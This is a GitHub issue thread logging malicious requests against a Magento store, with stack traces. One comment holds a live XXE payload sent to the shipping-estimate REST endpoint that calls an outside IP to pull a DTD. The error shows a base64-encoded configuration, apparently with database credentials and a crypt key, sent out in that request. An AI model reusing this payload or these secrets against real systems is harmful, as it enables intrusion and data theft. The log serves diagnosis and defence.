### ISSUE TITLE
Malicious requests to `lodgable.me` are mistakenly forwarded to Magento

### ISSUE THREAD

**Issue by dmitrii-fediuk** [27estore/192.241.193.5#36]
```
mage2pro/core: 11.3.0
Magento: 2.4.6-p4
PHP: 8.2.16
URL: http://lodgable.me//media/wp-includes/wlwmanifest.xml
Time: 2024-08-01 06:29:16
IP Address: 195.88.87.239
Request Method: GET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
File: vendor/magento/zend-db/library/Zend/Db/Adapter/Pdo/Abstract.php
Line: 148
************************************
[E_ERROR] Uncaught PDOException: SQLSTATE[HY000] [2002] No such file or directory in vendor/magento/zend-db/library/Zend/Db/Adapter/Pdo/Abstract.php:128
Stack trace:
#0 vendor/magento/zend-db/library/Zend/Db/Adapter/Pdo/Abstract.php(128): PDO->__construct('mysql:host=loca...', 'developer', Object(SensitiveParameterValue), Array)
#1 vendor/magento/zend-db/library/Zend/Db/Adapter/Pdo/Mysql.php(111): Zend_Db_Adapter_Pdo_Abstract->_connect()
#2 vendor/magento/framework/DB/Adapter/Pdo/Mysql.php(428): Zend_Db_Adapter_Pdo_Mysql->_connect()
#3 vendor/magento/zend-db/library/Zend/Db/Adapter/Abstract.php(460): Magento\Framework\DB\Adapter\Pdo\Mysql->_connect()
#4 vendor/magento/zend-db/library/Zend/Db/Adapter/Pdo/Abstract.php(242): Zend_Db_Adapter_Abstract->query('SELECT `store_w...', Array)
#5 vendor/magento/framework/DB/Adapter/Pdo/Mysql.php(564): Zend_Db_Adapter_Pdo_Abstract->query('SELECT `store_w...', Array)
#6 vendor/magento/framework/DB/Adapter/Pdo/Mysql.php(634): Magento\Framework\DB\Adapter\Pdo\Mysql->_query('SELECT `store_w...', Array)
#7 vendor/magento/zend-db/library/Zend/Db/Adapter/Abstract.php(737): Magento\Framework\DB\Adapter\Pdo\Mysql->query(Object(Magento\Framework\DB\Select), Array)
#8 vendor/magento/module-store/App/Config/Source/RuntimeConfigSource.php(100): Zend_Db_Adapter_Abstract->fetchAll(Object(Magento\Framework\DB\Select))
#9 vendor/magento/module-store/App/Config/Source/RuntimeConfigSource.php(61): Magento\Store\App\Config\Source\RuntimeConfigSource->getEntities('store_website', 'code')
#10 vendor/magento/framework/App/Config/ConfigSourceAggregated.php(42): Magento\Store\App\Config\Source\RuntimeConfigSource->get('')
#11 generated/code/Magento/Framework/App/Config/ConfigSourceAggregated/Proxy.php(95): Magento\Framework\App\Config\ConfigSourceAggregated->get('')
#12 vendor/magento/module-store/App/Config/Type/Scopes.php(63): Magento\Framework\App\Config\ConfigSourceAggregated\Proxy->get()
#13 vendor/magento/framework/App/Config.php(132): Magento\Store\App\Config\Type\Scopes->get('stores/1')
#14 vendor/magento/module-store/Model/StoreRepository.php(106): Magento\Framework\App\Config->get('scopes', 'stores/1', Array)
#15 vendor/magento/module-store/Model/StoreRepository.php(127): Magento\Store\Model\StoreRepository->getById('1')
#16 vendor/magento/module-store/Model/StoreResolver.php(181): Magento\Store\Model\StoreRepository->getActiveStoreById('1')
#17 vendor/magento/module-store/Model/StoreResolver.php(126): Magento\Store\Model\StoreResolver->getDefaultStoreById('1')
#18 vendor/magento/module-store/Model/StoreManager.php(160): Magento\Store\Model\StoreResolver->getCurrentStoreId()
#19 generated/code/Magento/Store/Model/StoreManagerInterface/Proxy.php(119): Magento\Store\Model\StoreManager->getStore(NULL)
#20 vendor/magento/module-store/Model/Resolver/Store.php(30): Magento\Store\Model\StoreManagerInterface\Proxy->getStore(NULL)
#21 vendor/magento/framework/Translate/Inline.php(144): Magento\Store\Model\Resolver\Store->getScope(NULL)
#22 vendor/magento/framework/Escaper.php(282): Magento\Framework\Translate\Inline->isAllowed()
#23 pub/errors/default/page.phtml(13): Magento/Framework/Escaper->escapeHtmlAttr('https://lodgabl...')
#24 pub/errors/processor.php(438): require_once('/var/www/27esto...')
#25 pub/errors/processor.php(219): Magento\Framework\Error\Processor->_renderPage('404.phtml')
#26 pub/errors/404.php(11): Magento\Framework\Error\Processor->process404()
#27 pub/get.php(69): require_once('/var/www/27esto...')
#28 {main}

Next Zend_Db_Adapter_Exception: SQLSTATE[HY000] [2002] No such file or directory in vendor/magento/zend-db/library/Zend/Db/Adapter/Pdo/Abstract.php:148
Stack trace:
#0 vendor/magento/zend-db/library/Zend/Db/Adapter/Pdo/Mysql.php(111): Zend_Db_Adapter_Pdo_Abstract->_connect()
#1 vendor/magento/framework/DB/Adapter/Pdo/Mysql.php(428): Zend_Db_Adapter_Pdo_Mysql->_connect()
#2 vendor/magento/zend-db/library/Zend/Db/Adapter/Abstract.php(460): Magento\Framework\DB\Adapter\Pdo\Mysql->_connect()
#3 vendor/magento/zend-db/library/Zend/Db/Adapter/Pdo/Abstract.php(242): Zend_Db_Adapter_Abstract->query('SELECT `store_w...', Array)
#4 vendor/magento/framework/DB/Adapter/Pdo/Mysql.php(564): Zend_Db_Adapter_Pdo_Abstract->query('SELECT `store_w...', Array)
#5 vendor/magento/framework/DB/Adapter/Pdo/Mysql.php(634): Magento\Framework\DB\Adapter\Pdo\Mysql->_query('SELECT `store_w...', Array)
#6 vendor/magento/zend-db/library/Zend/Db/Adapter/Abstract.php(737): Magento\Framework\DB\Adapter\Pdo\Mysql->query(Object(Magento\Framework\DB\Select), Array)
#7 vendor/magento/module-store/App/Config/Source/RuntimeConfigSource.php(100): Zend_Db_Adapter_Abstract->fetchAll(Object(Magento\Framework\DB\Select))
#8 vendor/magento/module-store/App/Config/Source/RuntimeConfigSource.php(61): Magento\Store\App\Config\Source\RuntimeConfigSource->getEntities('store_website', 'code')
#9 vendor/magento/framework/App/Config/ConfigSourceAggregated.php(42): Magento\Store\App\Config\Source\RuntimeConfigSource->get('')
#10 generated/code/Magento/Framework/App/Config/ConfigSourceAggregated/Proxy.php(95): Magento\Framework\App\Config\ConfigSourceAggregated->get('')
#11 vendor/magento/module-store/App/Config/Type/Scopes.php(63): Magento\Framework\App\Config\ConfigSourceAggregated\Proxy->get()
#12 vendor/magento/framework/App/Config.php(132): Magento\Store\App\Config\Type\Scopes->get('stores/1')
#13 vendor/magento/module-store/Model/StoreRepository.php(106): Magento\Framework\App\Config->get('scopes', 'stores/1', Array)
#14 vendor/magento/module-store/Model/StoreRepository.php(127): Magento\Store\Model\StoreRepository->getById('1')
#15 vendor/magento/module-store/Model/StoreResolver.php(181): Magento\Store\Model\StoreRepository->getActiveStoreById('1')
#16 vendor/magento/module-store/Model/StoreResolver.php(126): Magento\Store\Model\StoreResolver->getDefaultStoreById('1')
#17 vendor/magento/module-store/Model/StoreManager.php(160): Magento\Store\Model\StoreResolver->getCurrentStoreId()
#18 generated/code/Magento/Store/Model/StoreManagerInterface/Proxy.php(119): Magento\Store\Model\StoreManager->getStore(NULL)
#19 vendor/magento/module-store/Model/Resolver/Store.php(30): Magento\Store\Model\StoreManagerInterface\Proxy->getStore(NULL)
#20 vendor/magento/framework/Translate/Inline.php(144): Magento\Store\Model\Resolver\Store->getScope(NULL)
#21 vendor/magento/framework/Escaper.php(282): Magento\Framework\Translate\Inline->isAllowed()
#22 pub/errors/default/page.phtml(13): Magento/Framework/Escaper->escapeHtmlAttr('https://lodgabl...')
#23 pub/errors/processor.php(438): require_once('/var/www/27esto...')
#24 pub/errors/processor.php(219): Magento\Framework\Error\Processor->_renderPage('404.phtml')
#25 pub/errors/404.php(11): Magento\Framework\Error\Processor->process404()
#26 pub/get.php(69): require_once('/var/www/27esto...')
#27 {main}
  thrown
```

**Comment by dmitrii-fediuk** [comment]
```
{
    "mage2pro/core": "11.3.0",
    "Magento": "2.4.6-p4",
    "PHP": "8.2.16",
    "URL": "http://prod1.lodgable.me/wp-content/themes/seotheme/db.php?u",
    "Time": "2024-08-02 15:07:58",
    "Referer": "",
    "IP Address": "20.234.33.96",
    "Request Method": "GET",
    "User-Agent": false
}
EXCEPTION
No message
************************************
[]
************************************
1	df_assert
	https://github.com/mage2pro/core/tree/11.3.0/Qa/lib/validation/assert/main.php#L78
	vendor/mage2pro/core/Qa/lib/validation/assert/main.php:78

2	Df\Qa\Trace\Frame::Df\Qa\Trace\{closure}
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Trace/Frame.php#L131
	vendor/mage2pro/core/Qa/Trace/Frame.php:131

3	dfc
	https://github.com/mage2pro/core/tree/11.3.0/Core/lib/cache/dfc.php#L89
	vendor/mage2pro/core/Core/lib/cache/dfc.php:89

4	Df\Qa\Trace\Frame::url
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Trace/Frame.php#L103
	vendor/mage2pro/core/Qa/Trace/Frame.php:103

5	Df\Qa\Trace\Formatter::Df\Qa\Trace\{closure}
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Trace/Formatter.php#L16
	vendor/mage2pro/core/Qa/Trace/Formatter.php:16

6	df_map
	https://github.com/mage2pro/core/tree/11.3.0/Core/lib/array/map.php#L136
	vendor/mage2pro/core/Core/lib/array/map.php:136

7	df_map_k
	https://github.com/mage2pro/core/tree/11.3.0/Core/lib/array/map.php#L175
	vendor/mage2pro/core/Core/lib/array/map.php:175

8	Df\Qa\Trace\Formatter::Df\Qa\Trace\{closure}
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Trace/Formatter.php#L13
	vendor/mage2pro/core/Qa/Trace/Formatter.php:13

9	df_try
	https://github.com/mage2pro/core/tree/11.3.0/Core/lib/lang/try.php#L48
	vendor/mage2pro/core/Core/lib/lang/try.php:48

10	Df\Qa\Trace\Formatter::Df\Qa\Trace\{closure}
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Trace/Formatter.php#L12
	vendor/mage2pro/core/Qa/Trace/Formatter.php:12

11	dfcf
	https://github.com/mage2pro/core/tree/11.3.0/Core/lib/cache/dfcf.php#L173
	vendor/mage2pro/core/Core/lib/cache/dfcf.php:173

12	Df\Qa\Trace\Formatter::p
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Trace/Formatter.php#L12
	vendor/mage2pro/core/Qa/Trace/Formatter.php:12

13	Df\Qa\Failure::postface
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Failure.php#L38
	vendor/mage2pro/core/Qa/Failure.php:38

14	Df\Qa\Failure\Exception::postface
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Failure/Exception.php#L25
	vendor/mage2pro/core/Qa/Failure/Exception.php:25

15	Df\Qa\Failure::Df\Qa\{closure}
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Failure.php#L30
	vendor/mage2pro/core/Qa/Failure.php:30

16	dfc
	https://github.com/mage2pro/core/tree/11.3.0/Core/lib/cache/dfc.php#L89
	vendor/mage2pro/core/Core/lib/cache/dfc.php:89

17	Df\Qa\Failure::report
	https://github.com/mage2pro/core/tree/11.3.0/Qa/Failure.php#L29
	vendor/mage2pro/core/Qa/Failure.php:29

18	df_log_l
	https://github.com/mage2pro/core/tree/11.3.0/Qa/lib/log.php#L95
	vendor/mage2pro/core/Qa/lib/log.php:95

19	Df\Framework\Log\Dispatcher::handle
	https://github.com/mage2pro/core/tree/11.3.0/Framework/Log/Dispatcher.php#L114
	vendor/mage2pro/core/Framework/Log/Dispatcher.php:114

20	Monolog\Logger::addRecord
	vendor/monolog/monolog/src/Monolog/Logger.php:399

21	Monolog\Logger::critical
	vendor/monolog/monolog/src/Monolog/Logger.php:663

22	Magento\Framework\Logger\LoggerProxy::critical
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Logger/LoggerProxy.php#L121
	vendor/magento/framework/Logger/LoggerProxy.php:121

23	Magento\Framework\App\Bootstrap::terminate
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/App/Bootstrap.php#L445
	vendor/magento/framework/App/Bootstrap.php:445

24	Magento\Framework\App\Bootstrap::run
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/App/Bootstrap.php#L275
	vendor/magento/framework/App/Bootstrap.php:275
```

**Comment by dmitrii-fediuk** [comment]
```
{
    "mage2pro/core": "11.3.0",
    "Magento": "2.4.6-p4",
    "PHP": "8.2.16",
    "URL": "http://lodgable.me/rest/V1/guest-carts/1/estimate-shipping-methods",
    "Time": "2024-08-08 04:31:43",
    "Referer": "",
    "IP Address": "193.233.130.58",
    "Request Method": "POST",
    "User-Agent": "Ruby",
    "php://input": "{\"address\":{\"Oaqcmkzg\":\"oGlUlmpw\",\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"<?xml version='1.0' ?><!DOCTYPE MKXtCjXE[  <!ELEMENT IyGdIeFm ANY >    <!ENTITY % QPGDXrOm SYSTEM 'http://91.92.244.237:11194/httpslodgableltdme.dtd'> %QPGDXrOm; %KnFJgvep; ]> <r>&TOftgygQ;</r>\",\"options\":524290}}}}}}"
}
EXCEPTION
Warning: SimpleXMLElement::__construct(http://91.92.244.237:11194/?hpCOfILM=httpslodgableltdme-PD9waHAKcmV0dXJuIFsKICAgICdiYWNrZW5kJyA9PiBbCiAgICAgICAgJ2Zyb250TmFtZScgPT4gJ2l2YjExMTNwZG4nCiAgICBdLAogICAgJ2NyeXB0JyA9PiBbCiAgICAgICAgJ2tleScgPT4gJ2I5N2I5NzBlYzNmOTFhMGMxZjNkNDc2NWRmZWZkOGY4JwogICAgXSwKICAgICdkYicgPT4gWwogICAgICAgICd0YWJsZV9wcmVmaXgnID0+ICcnLAogICAgICAgICdjb25uZWN0aW9uJyA9PiBbCiAgICAgICAgICAgICdkZWZhdWx0JyA9PiBbCiAgICAgICAgICAgICAgICAnaG9zdCcgPT4gJ2xvY2FsaG9zdCcsCiAgICAgICAgICAgICAgICAnZGJuYW1lJyA9PiAnMjAyNF8yN2VzdG9yZScsCiAgICAgICAgICAgICAgICAndXNlcm5hbWUnID0+ICdkZXZlbG9wZXInLAogICAgICAgICAgICAgICAgJ3Bhc3N3b3JkJyA9PiAna3Mjb1BLOCRza2EtMjJNc2EnLAogICAgICAgICAgICAgICAgJ2FjdGl2ZScgPT4gJzEnCiAgICAgICAgICAgIF0KICAgICAgICBdCiAgICBdLAogICAgJ3Jlc291cmNlJyA9PiBbCiAgICAgICAgJ2RlZmF1bHRfc2V0dXAnID0+IFsKICAgICAgICAgICAgJ2Nvbm5lY3Rpb24nID0+ICdkZWZhdWx0JwogICAgICAgIF0KICAgIF0sCiAgICAneC1mcmFtZS1vcHRpb25zJyA9PiAnU0FNRU9SSUdJTicsCiAgICAnTUFHRV9NT0RFJyA9PiAncHJvZHVjdGlvbicsCiAgICAnc2Vzc2lvbicgPT4gWwogICAgICAgICdzYXZlJyA9PiAnZmlsZXMnCiAgICBdLAogICAgJ2NhY2hlX3R5cGVzJyA9PiBbCiAgICAgICAgJ2NvbmZpZycgPT4gMSwKICAgICAgICAnbGF5b3V0JyA9PiAxLAogICAgICAgICdibG9ja19odG1sJyA9PiAxLAogICAgICAgICdjb2xsZWN0aW9ucycgPT4gMSwKICAgICAgICAncmVmbGVjdGlvbicgPT4gMSwKICAgICAgICAnZGJfZGRsJyA9PiAxLAogICAgICAgICdjb21waWxlZF9jb25maWcnID0+IDEsCiAgICAgICAgJ2VhdicgPT4gMSwKICAgICAgICAnY3VzdG9tZXJfbm90aWZpY2F0aW9uJyA9PiAxLAogICAgICAgICdjb25maWdfaW50ZWdyYXRpb24nID0+IDEsCiAgICAgICAgJ2NvbmZpZ19pbnRlZ3JhdGlvbl9hcGknID0+IDEsCiAgICAgICAgJ2Z1bGxfcGFnZScgPT4gMSwKICAgICAgICAnY29uZmlnX3dlYnNlcnZpY2UnID0+IDEsCiAgICAgICAgJ3RyYW5zbGF0ZScgPT4gMSwKICAgICAgICAndmVydGV4JyA9PiAxLAogICAgICAgICdnb29nbGVfcHJvZHVjdCcgPT4gMSwKICAgICAgICAnd3BfZ3RtX2NhdGVnb3JpZXMnID0+IDEKICAgIF0sCiAgICAnaW5zdGFsbCcgPT4gWwogICAgICAgICdkYXRlJyA9PiAnVGh1LCAxOSBTZXAgMjAxOSAxNTo1MjowOSArMDAwMCcKICAgIF0sCiAgICAnZG93bmxvYWRhYmxlX2RvbWFpbnMnID0+IFsKICAgICAgICAnd3d3LjI3ZXN0b3JlLmNvbScKICAgIF0sCiAgICAnY2FjaGUnID0+IFsKICAgICAgICAnZnJvbnRlbmQnID0+IFsKCiAgICAgICAgXSwKICAgICAgICAnZ3JhcGhxbCcgPT4gWwogICAgICAgICAgICAnaWRfc2FsdCcgPT4gJzk5ZUhjV2lJNldzbEN6VXFxZElLYWJ5ZlV6UDhXbG04JwogICAgICAgIF0KICAgIF0KXTsK): Failed to open stream: HTTP request failed! HTTP/1.1 414 Request-URI Too Large
 in vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php on line 121
************************************
[]
************************************
1	Magento\Framework\App\ErrorHandler::handler
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/App/ErrorHandler.php#L62
	vendor/magento/framework/App/ErrorHandler.php:62

2	SimpleXMLElement::__construct
	0

3	Magento\Framework\ObjectManager\Factory\AbstractFactory::createObject
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/ObjectManager/Factory/AbstractFactory.php#L121
	vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php:121

4	Magento\Framework\ObjectManager\Factory\Compiled::create
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/ObjectManager/Factory/Compiled.php#L108
	vendor/magento/framework/ObjectManager/Factory/Compiled.php:108

5	Magento\Framework\ObjectManager\ObjectManager::create
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/ObjectManager/ObjectManager.php#L56
	vendor/magento/framework/ObjectManager/ObjectManager.php:56

6	Magento\Framework\Webapi\ServiceInputProcessor::_createFromArray
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L285
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:285

7	Magento\Framework\Webapi\ServiceInputProcessor::convertValue
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L524
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:524

8	Magento\Framework\Webapi\ServiceInputProcessor::getConstructorData
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L247
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:247

9	Magento\Framework\Webapi\ServiceInputProcessor::_createFromArray
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L284
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:284

10	Magento\Framework\Webapi\ServiceInputProcessor::convertValue
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L524
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:524

11	Magento\Framework\Webapi\ServiceInputProcessor::getConstructorData
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L247
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:247

12	Magento\Framework\Webapi\ServiceInputProcessor::_createFromArray
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L284
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:284

13	Magento\Framework\Webapi\ServiceInputProcessor::convertValue
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L524
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:524

14	Magento\Framework\Webapi\ServiceInputProcessor::getConstructorData
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L247
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:247

15	Magento\Framework\Webapi\ServiceInputProcessor::_createFromArray
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L284
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:284

16	Magento\Framework\Webapi\ServiceInputProcessor::convertValue
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L524
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:524

17	Magento\Framework\Webapi\ServiceInputProcessor::getConstructorData
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L247
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:247

18	Magento\Framework\Webapi\ServiceInputProcessor::_createFromArray
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L284
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:284

19	Magento\Framework\Webapi\ServiceInputProcessor::convertValue
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L524
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:524

20	Magento\Framework\Webapi\ServiceInputProcessor::process
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php#L200
	vendor/magento/framework/Webapi/ServiceInputProcessor.php:200

21	Magento\Webapi\Controller\Rest\InputParamsResolver::resolve
	https://github.com/magento/magento2/tree/2.4.6-p4/app/code/Magento/Webapi/Controller/Rest/InputParamsResolver.php#L112
	vendor/magento/module-webapi/Controller/Rest/InputParamsResolver.php:112

22	Magento\Webapi\Controller\Rest\InputParamsResolver::___callParent
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L58
	vendor/magento/framework/Interception/Interceptor.php:58

23	Magento\Webapi\Controller\Rest\InputParamsResolver::Magento\Framework\Interception\{closure}
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L138
	vendor/magento/framework/Interception/Interceptor.php:138

24	Magento\Webapi\Controller\Rest\InputParamsResolver::___callPlugins
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L153
	vendor/magento/framework/Interception/Interceptor.php:153

25	Magento\Webapi\Controller\Rest\InputParamsResolver::resolve
	generated/code/Magento/Webapi/Controller/Rest/InputParamsResolver/Interceptor.php:23

26	Magento\Webapi\Controller\Rest\SynchronousRequestProcessor::process
	https://github.com/magento/magento2/tree/2.4.6-p4/app/code/Magento/Webapi/Controller/Rest/SynchronousRequestProcessor.php#L85
	vendor/magento/module-webapi/Controller/Rest/SynchronousRequestProcessor.php:85

27	Magento\Webapi\Controller\Rest::dispatch
	https://github.com/magento/magento2/tree/2.4.6-p4/app/code/Magento/Webapi/Controller/Rest.php#L202
	vendor/magento/module-webapi/Controller/Rest.php:202

28	Magento\Webapi\Controller\Rest::___callParent
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L58
	vendor/magento/framework/Interception/Interceptor.php:58

29	Magento\Webapi\Controller\Rest::Magento\Framework\Interception\{closure}
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L138
	vendor/magento/framework/Interception/Interceptor.php:138

30	Magento\Webapi\Controller\Rest::___callPlugins
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L153
	vendor/magento/framework/Interception/Interceptor.php:153

31	Magento\Webapi\Controller\Rest::dispatch
	generated/code/Magento/Webapi/Controller/Rest/Interceptor.php:23

32	Magento\Framework\App\Http::launch
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/App/Http.php#L116
	vendor/magento/framework/App/Http.php:116

33	Magento\Framework\App\Http::___callParent
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L58
	vendor/magento/framework/Interception/Interceptor.php:58

34	Magento\Framework\App\Http::Magento\Framework\Interception\{closure}
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L138
	vendor/magento/framework/Interception/Interceptor.php:138

35	Df\Framework\Plugin\App\Http::aroundLaunch
	https://github.com/mage2pro/core/tree/11.3.0/Framework/Plugin/App/Http.php#L10
	vendor/mage2pro/core/Framework/Plugin/App/Http.php:10

36	Magento\Framework\App\Http::Magento\Framework\Interception\{closure}
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L135
	vendor/magento/framework/Interception/Interceptor.php:135

37	Magento\Framework\App\Http::___callPlugins
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/Interception/Interceptor.php#L153
	vendor/magento/framework/Interception/Interceptor.php:153

38	Magento\Framework\App\Http::launch
	generated/code/Magento/Framework/App/Http/Interceptor.php:23

39	Magento\Framework\App\Bootstrap::run
	https://github.com/magento/magento2/tree/2.4.6-p4/lib/internal/Magento/Framework/App/Bootstrap.php#L264
	vendor/magento/framework/App/Bootstrap.php:264
```
